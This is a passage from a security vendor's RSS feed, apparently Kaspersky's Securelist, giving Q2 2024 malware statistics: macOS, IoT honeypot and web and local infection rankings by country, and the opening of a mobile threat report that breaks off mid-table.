  1710. <p>In Q2 2024, numerous samples of the spyware Trojan-PSW.OSX.Amos (also known as Cuckoo) were found. This spyware is notable for requesting an administrator password through osascript, displaying a phishing window. Attackers regularly update and repackage this Trojan to avoid detection.</p>
  1711. <p>New versions of the <a href="https://www.huntress.com/blog/lightspy-malware-variant-targeting-macos" target="_blank" rel="noopener">LightRiver/LightSpy</a> spyware were also discovered. This Trojan downloads modules from the server with spy and backdoor functionalities. For example, they record the screen or audio, steal browser history, and execute arbitrary console commands.</p>
  1712. <h3 id="top-20-threats-to-macos">Top 20 threats to macOS</h3>
  1713. <div class="js-infogram-embed" data-id="_/iPjKVPodnbrCzpAZ3ufa" data-type="interactive" data-title="06 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div>
  1714. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The percentage of users who encountered a certain malware out of all attacked users of Kaspersky solutions for macOS (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174651/it-threat-evolution-q2-2024-pc-statistics_en_06.png" target="_blank" rel="noopener">download</a>)</em></p>
  1715. <p>The leading active threat continues to be a Trojan capable of downloading adware or other malicious applications. Other common threats include adware and fake &#8220;system optimizers&#8221; that demand money to &#8220;fix&#8221; nonexistent issues.</p>
  1716. <h3 id="geography-of-threats-for-macos">Geography of threats for macOS</h3>
  1717. <h4 id="top-10-countries-and-territories-by-share-of-attacked-users">Top 10 countries and territories by share of attacked users</h4>
  1718. <table width="100%">
  1719. <tbody>
  1720. <tr>
  1721. <td width="40%"></td>
  1722. <td width="30%"><strong>Q1 2024*</strong></td>
  1723. <td width="30%"><strong>Q2 2024*</strong></td>
  1724. </tr>
  1725. <tr>
  1726. <td>Spain</td>
  1727. <td>1.27%</td>
  1728. <td>1.14%</td>
  1729. </tr>
  1730. <tr>
  1731. <td>Mexico</td>
  1732. <td>0.88%</td>
  1733. <td>1.09%</td>
  1734. </tr>
  1735. <tr>
  1736. <td>Hong Kong</td>
  1737. <td>0.73%</td>
  1738. <td>0.97%</td>
  1739. </tr>
  1740. <tr>
  1741. <td>France</td>
  1742. <td>0.93%</td>
  1743. <td>0.93%</td>
  1744. </tr>
  1745. <tr>
  1746. <td>United States</td>
  1747. <td>0.81%</td>
  1748. <td>0.89%</td>
  1749. </tr>
  1750. <tr>
  1751. <td>Italy</td>
  1752. <td>1.11%</td>
  1753. <td>0.87%</td>
  1754. </tr>
  1755. <tr>
  1756. <td>United Kingdom</td>
  1757. <td>0.75%</td>
  1758. <td>0.85%</td>
  1759. </tr>
  1760. <tr>
  1761. <td>India</td>
  1762. <td>0.56%</td>
  1763. <td>0.70%</td>
  1764. </tr>
  1765. <tr>
  1766. <td>Germany</td>
  1767. <td>0.77%</td>
  1768. <td>0.59%</td>
  1769. </tr>
  1770. <tr>
  1771. <td>Brazil</td>
  1772. <td>0.66%</td>
  1773. <td>0.57%</td>
  1774. </tr>
  1775. </tbody>
  1776. </table>
  1777. <p>*Percentage of unique users encountering macOS threats out of all unique Kaspersky product users in that country or territory.</p>
  1778. <p>There has been a slight increase of 0.1–0.2 p.p. in the share of attacked users in Mexico, Hong Kong, the United Kingdom, and India. Conversely, we see a slight decline in Spain, Italy, and Germany.</p>
  1779. <h2 id="iot-threat-statistics">IoT threat statistics</h2>
  1780. <p>In the second quarter of 2024, the distribution of attack protocols on devices targeting Kaspersky honeypots was as follows:</p>
  1781. <div class="js-infogram-embed" data-id="_/kfBgkjO2sfQ8ieu7olds" data-type="interactive" data-title="07 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div>
  1782. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of attacked services by the number of unique IP addresses of the devices carrying out the attacks, Q1–Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174845/it-threat-evolution-q2-2024-pc-statistics_en_07.png" target="_blank" rel="noopener">download</a>)</em></p>
  1783. <p>The share of attacks using the Telnet protocol continued to grow, reaching 98%.</p>
  1784. <div class="js-infogram-embed" data-id="_/c1BG0LGkv1jE0iqLAyT0" data-type="interactive" data-title="08 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div>
  1785. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of cybercriminal sessions with Kaspersky honeypots, Q1–Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174922/it-threat-evolution-q2-2024-pc-statistics_en_08.png" target="_blank" rel="noopener">download</a>)</em></p>
  1786. <h3 id="top-10-threats-delivered-to-iot-devices">Top 10 threats delivered to IoT devices</h3>
  1787. <div class="js-infogram-embed" data-id="_/ZBDSnTGZ60ePjGkRiYyF" data-type="interactive" data-title="09 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div>
  1788. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Share of a specific threat downloaded to an infected device as a result of a successful attack, out of the total number of downloaded threats (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174956/it-threat-evolution-q2-2024-pc-statistics_en_09.png" target="_blank" rel="noopener">download</a>)</em></p>
  1789. <h3 id="attacks-on-iot-honeypots">Attacks on IoT honeypots</h3>
  1790. <p>For SSH protocol attacks, the share of attacks from China and India increased, while activity from South Korea slightly declined.</p>
  1791. <table width="100%">
  1792. <tbody>
  1793. <tr>
  1794. <td width="40%"><strong>SSH</strong></td>
  1795. <td width="30%"><strong>Q1 2024</strong></td>
  1796. <td width="30%"><strong>Q2 2024</strong></td>
  1797. </tr>
  1798. <tr>
  1799. <td>China</td>
  1800. <td>20.58%</td>
  1801. <td>23.37%</td>
  1802. </tr>
  1803. <tr>
  1804. <td>United States</td>
  1805. <td>12.15%</td>
  1806. <td>12.26%</td>
  1807. </tr>
  1808. <tr>
  1809. <td>South Korea</td>
  1810. <td>9.59%</td>
  1811. <td>6.84%</td>
  1812. </tr>
  1813. <tr>
  1814. <td>Singapore</td>
  1815. <td>6.87%</td>
  1816. <td>6.95%</td>
  1817. </tr>
  1818. <tr>
  1819. <td>Germany</td>
  1820. <td>4.97%</td>
  1821. <td>4.13%</td>
  1822. </tr>
  1823. <tr>
  1824. <td>India</td>
  1825. <td>4.52%</td>
  1826. <td>5.24%</td>
  1827. </tr>
  1828. <tr>
  1829. <td>Hong Kong</td>
  1830. <td>3.25%</td>
  1831. <td>3.10%</td>
  1832. </tr>
  1833. <tr>
  1834. <td>Russian Federation</td>
  1835. <td>2.84%</td>
  1836. <td>2.33%</td>
  1837. </tr>
  1838. <tr>
  1839. <td>Brazil</td>
  1840. <td>2.36%</td>
  1841. <td>2.73%</td>
  1842. </tr>
  1843. <tr>
  1844. <td>Japan</td>
  1845. <td>2.36%</td>
  1846. <td>1.92%</td>
  1847. </tr>
  1848. </tbody>
  1849. </table>
  1850. <p>Telnet attacks from China returned to 2023 levels, while the share from India grew.</p>
  1851. <table width="100%">
  1852. <tbody>
  1853. <tr>
  1854. <td width="40%"><strong>Telnet</strong></td>
  1855. <td width="30%"><strong>Q1 2024</strong></td>
  1856. <td width="30%"><strong>Q2 2024</strong></td>
  1857. </tr>
  1858. <tr>
  1859. <td>China</td>
  1860. <td>41.51%</td>
  1861. <td>30.24%</td>
  1862. </tr>
  1863. <tr>
  1864. <td>India</td>
  1865. <td>17.47%</td>
  1866. <td>22.68%</td>
  1867. </tr>
  1868. <tr>
  1869. <td>Japan</td>
  1870. <td>4.89%</td>
  1871. <td>3.64%</td>
  1872. </tr>
  1873. <tr>
  1874. <td>Brazil</td>
  1875. <td>3.78%</td>
  1876. <td>4.48%</td>
  1877. </tr>
  1878. <tr>
  1879. <td>Russian Federation</td>
  1880. <td>3.12%</td>
  1881. <td>3.85%</td>
  1882. </tr>
  1883. <tr>
  1884. <td>Thailand</td>
  1885. <td>2.95%</td>
  1886. <td>2.37%</td>
  1887. </tr>
  1888. <tr>
  1889. <td>Taiwan</td>
  1890. <td>2.73%</td>
  1891. <td>2.64%</td>
  1892. </tr>
  1893. <tr>
  1894. <td>South Korea</td>
  1895. <td>2.53%</td>
  1896. <td>2.46%</td>
  1897. </tr>
  1898. <tr>
  1899. <td>United States</td>
  1900. <td>2.20%</td>
  1901. <td>2.66%</td>
  1902. </tr>
  1903. <tr>
  1904. <td>Argentina</td>
  1905. <td>1.36%</td>
  1906. <td>1.76%</td>
  1907. </tr>
  1908. </tbody>
  1909. </table>
  1910. <h2 id="attacks-via-web-resources">Attacks via web resources</h2>
  1911. <p><em>The statistics in this section are based on the work of the web antivirus, which protects users at the moment malicious objects are downloaded from a malicious or infected webpage. Cybercriminals intentionally create malicious pages. Web resources with user-created content (such as forums), as well as compromised legitimate sites, can also be infected.</em></p>
  1912. <h3 id="countries-and-territories-that-serve-as-sources-of-web-based-attacks-top-10">Countries and territories that serve as sources of web-based attacks: Top 10</h3>
  1913. <p>The following statistics show the distribution of countries and territories that were the sources of internet attacks on users&#8217; computers blocked by Kaspersky products (webpages with redirects to exploits, sites with exploits and other malware, botnet control centers, and so on). Any unique host could be the source of one or more web-based attacks.</p>
  1914. <p>To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.</p>
  1915. <p>In Q2 2024, Kaspersky solutions blocked 664,046,455 attacks launched from online resources across the globe. A total of 113,535,455 unique URLs that triggered the web antivirus were recorded.</p>
  1916. <div class="js-infogram-embed" data-id="_/SXJt6NhNH17lApfY7i2X" data-type="interactive" data-title="10 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div>
  1917. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of web attack sources by country and territory (Q2 2024) (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02175327/it-threat-evolution-q2-2024-pc-statistics_en_10.png" target="_blank" rel="noopener">download</a>)</em></p>
  1918. <h3 id="countries-and-territories-where-users-faced-the-greatest-risk-of-online-infection">Countries and territories where users faced the greatest risk of online infection</h3>
  1919. <p>To assess the risk of malware infection through the internet faced by user&#8217;s computers in different countries and territories, we calculated the share of Kaspersky product users who encountered web antivirus detections during the reporting period for each country and territory. This data indicates the aggressiveness of the environment in which computers operate.</p>
  1920. <p>The following statistics are based on the detection verdicts of the web antivirus module, provided by Kaspersky product users who consented to share statistical data.</p>
  1921. <p>It&#8217;s important to note that only attacks involving malicious objects of the <strong>Malware</strong> class are included in this ranking. Web antivirus detections for potentially dangerous and unwanted programs, such as RiskTool and adware, were not counted.</p>
  1922. <table width="100%">
  1923. <tbody>
  1924. <tr>
  1925. <td width="10%"></td>
  1926. <td width="50%"><strong>Country/territory*</strong></td>
  1927. <td width="40%"><strong>% of attacked users**</strong></td>
  1928. </tr>
  1929. <tr>
  1930. <td>1</td>
  1931. <td>Moldova</td>
  1932. <td>11.3635</td>
  1933. </tr>
  1934. <tr>
  1935. <td>2</td>
  1936. <td>Greece</td>
  1937. <td>10.8560</td>
  1938. </tr>
  1939. <tr>
  1940. <td>3</td>
  1941. <td>Qatar</td>
  1942. <td>10.4018</td>
  1943. </tr>
  1944. <tr>
  1945. <td>4</td>
  1946. <td>Belarus</td>
  1947. <td>9.8162</td>
  1948. </tr>
  1949. <tr>
  1950. <td>5</td>
  1951. <td>Argentina</td>
  1952. <td>9.5380</td>
  1953. </tr>
  1954. <tr>
  1955. <td>6</td>
  1956. <td>Bulgaria</td>
  1957. <td>9.4714</td>
  1958. </tr>
  1959. <tr>
  1960. <td>7</td>
  1961. <td>South Africa</td>
  1962. <td>9.4128</td>
  1963. </tr>
  1964. <tr>
  1965. <td>8</td>
  1966. <td>Sri Lanka</td>
  1967. <td>9.1585</td>
  1968. </tr>
  1969. <tr>
  1970. <td>9</td>
  1971. <td>Kyrgyzstan</td>
  1972. <td>8.8852</td>
  1973. </tr>
  1974. <tr>
  1975. <td>10</td>
  1976. <td>Lithuania</td>
  1977. <td>8.6847</td>
  1978. </tr>
  1979. <tr>
  1980. <td>11</td>
  1981. <td>Tunisia</td>
  1982. <td>8.6739</td>
  1983. </tr>
  1984. <tr>
  1985. <td>12</td>
  1986. <td>Albania</td>
  1987. <td>8.6586</td>
  1988. </tr>
  1989. <tr>
  1990. <td>13</td>
  1991. <td>North Macedonia</td>
  1992. <td>8.6463</td>
  1993. </tr>
  1994. <tr>
  1995. <td>14</td>
  1996. <td>Bosnia &amp; Herzegovina</td>
  1997. <td>8.6291</td>
  1998. </tr>
  1999. <tr>
  2000. <td>15</td>
  2001. <td>Botswana</td>
  2002. <td>8.6254</td>
  2003. </tr>
  2004. <tr>
  2005. <td>16</td>
  2006. <td>UAE</td>
  2007. <td>8.5993</td>
  2008. </tr>
  2009. <tr>
  2010. <td>17</td>
  2011. <td>Germany</td>
  2012. <td>8.5887</td>
  2013. </tr>
  2014. <tr>
  2015. <td>18</td>
  2016. <td>Slovenia</td>
  2017. <td>8.5851</td>
  2018. </tr>
  2019. <tr>
  2020. <td>19</td>
  2021. <td>Egypt</td>
  2022. <td>8.5582</td>
  2023. </tr>
  2024. <tr>
  2025. <td>20</td>
  2026. <td>Canada</td>
  2027. <td>8.4985</td>
  2028. </tr>
  2029. </tbody>
  2030. </table>
  2031. <p>*Countries and territories with fewer than 10,000 Kaspersky users were excluded from the calculations.<br />
  2032. **Percentage of unique users subjected to web attacks by malicious objects of the <strong>Malware</strong> class out of all unique Kaspersky product users in that country or territory.</p>
  2033. <p>On average during the quarter, 7.38% of the internet users&#8217; computers worldwide were subjected to at least one <strong>Malware</strong>-category web attack.</p>
  2034. <h2 id="local-threats">Local threats</h2>
  2035. <p>Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).</p>
  2036. <p>Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The following statistics are based on detection verdicts from the OAS (on-access scan, scanning when accessing a file) and ODS (on-demand scan, scanning launched by a user) antivirus modules, provided by Kaspersky product users who agreed to share statistical data. These statistics take into account malware found directly on users&#8217; computers or on removable media connected to computers, such as flash drives, camera memory cards, phones, and external hard drives.</p>
  2037. <p>In the second quarter of 2024, our file antivirus detected 27,394,168 malicious and potentially unwanted objects.</p>
  2038. <h3 id="countries-and-territories-where-users-faced-the-highest-risk-of-local-infection">Countries and territories where users faced the highest risk of local infection</h3>
  2039. <p>For each country and territory, we calculated the percentage of Kaspersky users on whose computers file antivirus was triggered during the reporting period. This data reflects the level of infection of personal computers across different countries and territories worldwide.</p>
  2040. <p>Note that only attacks involving malicious objects of the <strong>Malware</strong> class are included in this ranking. Detections of potentially dangerous or unwanted programs such as RiskTool and adware were not counted.</p>
  2041. <table width="100%">
  2042. <tbody>
  2043. <tr>
  2044. <td width="10%"></td>
  2045. <td width="50%"><strong>Country/territory*</strong></td>
  2046. <td width="40%"><strong>% of attacked users**</strong></td>
  2047. </tr>
  2048. <tr>
  2049. <td>1</td>
  2050. <td>Turkmenistan</td>
  2051. <td>44.2517</td>
  2052. </tr>
  2053. <tr>
  2054. <td>2</td>
  2055. <td>Afghanistan</td>
  2056. <td>39.4972</td>
  2057. </tr>
  2058. <tr>
  2059. <td>3</td>
  2060. <td>Cuba</td>
  2061. <td>38.3242</td>
  2062. </tr>
  2063. <tr>
  2064. <td>4</td>
  2065. <td>Yemen</td>
  2066. <td>38.2295</td>
  2067. </tr>
  2068. <tr>
  2069. <td>5</td>
  2070. <td>Tajikistan</td>
  2071. <td>37.5013</td>
  2072. </tr>
  2073. <tr>
  2074. <td>6</td>
  2075. <td>Uzbekistan</td>
  2076. <td>32.7085</td>
  2077. </tr>
  2078. <tr>
  2079. <td>7</td>
  2080. <td>Syria</td>
  2081. <td>31.5546</td>
  2082. </tr>
  2083. <tr>
  2084. <td>8</td>
  2085. <td>Burundi</td>
  2086. <td>30.5511</td>
  2087. </tr>
  2088. <tr>
  2089. <td>9</td>
  2090. <td>Bangladesh</td>
  2091. <td>28.3616</td>
  2092. </tr>
  2093. <tr>
  2094. <td>10</td>
  2095. <td>South Sudan</td>
  2096. <td>28.3293</td>
  2097. </tr>
  2098. <tr>
  2099. <td>11</td>
  2100. <td>Tanzania</td>
  2101. <td>28.0949</td>
  2102. </tr>
  2103. <tr>
  2104. <td>12</td>
  2105. <td>Cameroon</td>
  2106. <td>28.0254</td>
  2107. </tr>
  2108. <tr>
  2109. <td>13</td>
  2110. <td>Niger</td>
  2111. <td>27.9138</td>
  2112. </tr>
  2113. <tr>
  2114. <td>14</td>
  2115. <td>Algeria</td>
  2116. <td>27.8984</td>
  2117. </tr>
  2118. <tr>
  2119. <td>15</td>
  2120. <td>Benin</td>
  2121. <td>27.6164</td>
  2122. </tr>
  2123. <tr>
  2124. <td>16</td>
  2125. <td>Myanmar</td>
  2126. <td>26.6960</td>
  2127. </tr>
  2128. <tr>
  2129. <td>17</td>
  2130. <td>Venezuela</td>
  2131. <td>26.6944</td>
  2132. </tr>
  2133. <tr>
  2134. <td>18</td>
  2135. <td>Iran</td>
  2136. <td>26.5071</td>
  2137. </tr>
  2138. <tr>
  2139. <td>19</td>
  2140. <td>Vietnam</td>
  2141. <td>26.3409</td>
  2142. </tr>
  2143. <tr>
  2144. <td>20</td>
  2145. <td>Congo</td>
  2146. <td>26.3160</td>
  2147. </tr>
  2148. </tbody>
  2149. </table>
  2150. <p>*Countries and territories with fewer than 10,000 Kaspersky users were excluded from the calculations.<br />
  2151. **Percentage of unique users on whose computers local <strong>Malware</strong>-class threats were blocked, out of all unique Kaspersky product users in that country or territory.</p>
  2152. <p>On average, 14.2% of users&#8217; computers worldwide encountered at least one local <strong>Malware</strong>-class threat during the second quarter.</p>
  2153. <p>The figure for Russia was 15.68%.</p>
  2154. ]]></content:encoded>
  2155. <wfw:commentRss>https://securelist.com/it-threat-evolution-q2-2024-pc-statistics/113683/feed/</wfw:commentRss>
  2156. <slash:comments>0</slash:comments>
  2157. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  2158. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  2159. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  2160. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  2161. </item>
  2162. <item>
  2163. <title>IT threat evolution in Q2 2024. Mobile statistics</title>
  2164. <link>https://securelist.com/it-threat-evolution-q2-2024-mobile-statistics/113678/</link>
  2165. <comments>https://securelist.com/it-threat-evolution-q2-2024-mobile-statistics/113678/#respond</comments>
  2166. <dc:creator><![CDATA[Anton Kivva]]></dc:creator>
  2167. <pubDate>Tue, 03 Sep 2024 08:00:46 +0000</pubDate>
  2168. <category><![CDATA[Malware reports]]></category>
  2169. <category><![CDATA[Adware]]></category>
  2170. <category><![CDATA[Google Android]]></category>
  2171. <category><![CDATA[Google Play]]></category>
  2172. <category><![CDATA[Malware]]></category>
  2173. <category><![CDATA[Malware Statistics]]></category>
  2174. <category><![CDATA[Mobile Malware]]></category>
  2175. <category><![CDATA[Ransomware]]></category>
  2176. <category><![CDATA[Trojan Banker]]></category>
  2177. <category><![CDATA[Mobile threats]]></category>
  2178. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113678</guid>
  2179.  
  2180. <description><![CDATA[The report gives statistics on mobile malware and unwanted software for Q2 2024, including mobile banking Trojans and ransomware.]]></description>
  2181. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="quarterly-figures">Quarterly figures</h2>
  2182. <p>According to Kaspersky Security Network, in Q2 2024:</p>
  2183. <ul>
  2184. <li>7 million attacks using malware, adware or unwanted mobile software were blocked.</li>
  2185. <li>The most common threat to mobile devices was RiskTool software – 41% of all detected threats.</li>
  2186. <li>A total of 367,418 malicious installation packages were detected, of which:
  2187. <ul>
  2188. <li>13,013 packages were for mobile banking Trojans;</li>
  2189. <li>1,392 packages were for mobile ransomware Trojans.</li>
  2190. </ul>
  2191. </li>
  2192. </ul>
  2193. <h2 id="quarterly-highlights">Quarterly highlights</h2>
  2194. <p>The number of malware, adware or unwanted software attacks on mobile devices climbed relative to the same period last year, but dropped against Q1 2024, with 7,697,975 attacks detected.</p>
  2195. <div class="js-infogram-embed" data-id="_/Kq5izMS108R1oUH8YYru" data-type="interactive" data-title="01 EN-RU-ES q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div>
  2196. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of attacks on users of Kaspersky mobile solutions, Q4 2022 – Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02153137/it_threat_evolution_q2_2024_mobile_statistics_en_01.png" target="_blank" rel="noopener">download</a>)</em></p>
  2197. <p>The decrease is due to a sharp drop in the activity of adware apps, mostly from the covert applications of the AdWare.AndroidOS.HiddenAd family, which opens ads on the targeted device.</p>
  2198. <p>In April of this year, <a href="https://securelist.com/mandrake-apps-return-to-google-play/113147/" target="_blank" rel="noopener">new versions of Mandrake spyware</a> were discovered. Distributed via Google Play, these apps used sophisticated techniques to hide their malicious functionality: concealing dangerous code in an obfuscated native library; using certificate pinning to detect attempts to track app network traffic; and multiple methods to check for emulated runtime environments, such as sandboxes.</p>
  2199. <div id="attachment_113681" style="width: 603px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113681" class="size-full wp-image-113681" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01.png" alt="A Mandrake app on Google Play" width="593" height="889" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01.png 593w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01-200x300.png 200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01-233x350.png 233w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01-187x280.png 187w" sizes="(max-width: 593px) 100vw, 593px" /></a><p id="caption-attachment-113681" class="wp-caption-text">A Mandrake app on Google Play</p></div>
  2200. <p>Also in Q2, the IOBot banking Trojan was found targeting users in Korea. To install an additional malware component with VNC backdoor functionality, the Trojan&#8217;s authors use a technique to bypass Android protection against granting extended permissions to apps downloaded from unofficial sources.</p>
  2201. <h2 id="mobile-threat-statistics">Mobile threat statistics</h2>
  2202. <p>The number of Android malware samples fell against the previous quarter to the Q2 2023 level, totaling 367,418 installation packages.</p>
  2203. <div class="js-infogram-embed" data-id="_/dSYNvRvP2rHtPABuXKgo" data-type="interactive" data-title="02 EN-RU-ES q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div>
  2204. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of detected malicious installation packages, Q2 2023 – Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02153345/it_threat_evolution_q2_2024_mobile_statistics_en_02.png" target="_blank" rel="noopener">download</a>)</em></p>
  2205. <p>New trends emerged in the distribution of detected Adware and RiskTool packages: the former significantly decreased in number, while the latter increased. Otherwise, the number of detections remains largely the same.</p>
  2206. <div class="js-infogram-embed" data-id="_/tWBf1Zj5IVTaj4CnuQcZ" data-type="interactive" data-title="03 EN q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div>
  2207. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of detected mobile apps by type, Q1*–Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02153816/it_threat_evolution_q2_2024_mobile_statistics_en_03.png" target="_blank" rel="noopener">download</a>)</em></p>
  2208. <p><em>*Data for the previous quarter may differ slightly from previously published data due to some verdicts being retrospectively revised.</em></p>
  2209. <p>Among adware, the number of HiddenAd, BrowserAd and Adlo apps dropped sharply, while the number of RiskTool.AndroidOS.Fakapp apps distributed under the guise of pornographic material rose. These apps collect and forward device information to a server, then open arbitrary URLs sent back in response.</p>
  2210. <div class="js-infogram-embed" data-id="_/zsco24gXSPLMkWxjgZ0T" data-type="interactive" data-title="04 EN q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div>
  2211. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Users attacked by the malware or unwanted software as a percentage* of all targeted users of Kaspersky mobile products, Q1*–Q2 2024 (<a href="https://securelist.com/it-threat-evolution-q1-2024-mobile-statistics/112750/" target="_blank" rel="noopener">download</a>)</em></p>
  2212. <p><em>*The sum may be greater than 100% if the same users encountered more than one type of attack.</em></p>
  2213. <p>Despite the prevalence of RiskTool.AndroidOS.Fakapp installation packages, the number of real users who encountered this family showed no noticeable growth. In other words, attackers released many unique samples, but their distribution was limited.</p>
  2214. <p>The main changes in the distribution of the share of attacked users were driven by a fall in the activity of HiddenAd adware and a rise in the activity of two RiskTool apps: Revpn and SpyLoan.</p>
  2215. <h2 id="top-20-most-frequently-detected-mobile-malware-programs">TOP 20 most frequently detected mobile malware programs</h2>
  2216. <p><em>Note that the malware rankings below exclude riskware and potentially unwanted software, such as RiskTool or adware.</em></p>
  2217. <table width="100%">
  2218. <tbody>
  2219. <tr>
  2220. <td style="text-align: left" width="40%"><strong>Verdict</strong></td>
  2221. <td width="15%"><strong>Prev %</strong></td>
  2222. <td width="15%"><strong>New %</strong></td>
  2223. <td width="15%"><strong>Difference in p.p.</strong></td>
  2224. <td width="15%"><strong>Change in ranking</strong></td>
  2225. </tr>
  2226. <tr>
  2227. <td>DangerousObject.Multi.Generic</td>
  2228. <td>9.82</td>
  2229. <td>11.44</td>
  2230. <td>+1.61</td>
  2231. <td>+1</td>
  2232. </tr>
  2233. <tr>
  2234. <td>DangerousObject.AndroidOS.GenericML</td>
  2235. <td>3.83</td>
  2236. <td>7.56</td>
  2237. <td>+3.72</td>
  2238. <td>+6</td>
  2239. </tr>
  2240. <tr>
  2241. <td>Trojan.AndroidOS.Triada.ga</td>
  2242. <td>5.66</td>
  2243. <td>6.66</td>
  2244. <td>+1.00</td>
  2245. <td>+2</td>
  2246. </tr>
  2247. <tr>
  2248. <td>Trojan.AndroidOS.Fakemoney.v</td>
  2249. <td>8.60</td>
  2250. <td>6.60</td>
  2251. <td>-2.00</td>
  2252. <td>-1</td>
  2253. </tr>
  2254. <tr>
  2255. <td>Trojan.AndroidOS.Boogr.gsh</td>
  2256. <td>6.62</td>
  2257. <td>6.01</td>
  2258. <td>-0.61</td>
  2259. <td>-1</td>
  2260. </tr>
  2261. <tr>
  2262. <td>Trojan.AndroidOS.Triada.fd</td>
  2263. <td>10.38</td>
  2264. <td>5.89</td>
  2265. <td>-4.49</td>
  2266. <td>-5</td>
  2267. </tr>
  2268. <tr>
  2269. <td>Trojan.AndroidOS.Triada.gm</td>
  2270. <td>0.00</td>
  2271. <td>5.16</td>
  2272. <td>+5.16</td>
  2273. <td></td>
  2274. </tr>
  2275. <tr>
  2276. <td>Trojan-Downloader.AndroidOS.Dwphon.a</td>
  2277. <td>5.26</td>
  2278. <td>2.71</td>
  2279. <td>-2.55</td>
  2280. <td>-2</td>
  2281. </tr>
  2282. <tr>
  2283. <td>Trojan.AndroidOS.Generic</td>
  2284. <td>2.08</td>
  2285. <td>2.59</td>
  2286. <td>+0.51</td>
  2287. <td>+5</td>
  2288. </tr>
  2289. <tr>
  2290. <td>Trojan.AndroidOS.Triada.gn</td>
  2291. <td>0.00</td>
  2292. <td>2.23</td>
  2293. <td>+2.23</td>
  2294. <td></td>
  2295. </tr>
  2296. <tr>
  2297. <td>Trojan-Spy.AndroidOS.SpyNote.bz</td>
  2298. <td>3.52</td>
  2299. <td>1.97</td>
  2300. <td>-1.55</td>
  2301. <td>-2</td>
  2302. </tr>
  2303. <tr>
  2304. <td>Trojan-Dropper.AndroidOS.Agent.sm</td>
  2305. <td>2.09</td>
  2306. <td>1.75</td>
  2307. <td>-0.34</td>
  2308. <td>+1</td>
  2309. </tr>
  2310. <tr>
  2311. <td>Trojan.AndroidOS.Triada.gb</td>
  2312. <td>1.34</td>
  2313. <td>1.72</td>
  2314. <td>+0.37</td>
  2315. <td>+11</td>
  2316. </tr>
  2317. <tr>
  2318. <td>Trojan.AndroidOS.Fakemoney.bj</td>
  2319. <td>4.26</td>
  2320. <td>1.47</td>
  2321. <td>-2.79</td>
  2322. <td>-7</td>
  2323. </tr>
  2324. <tr>
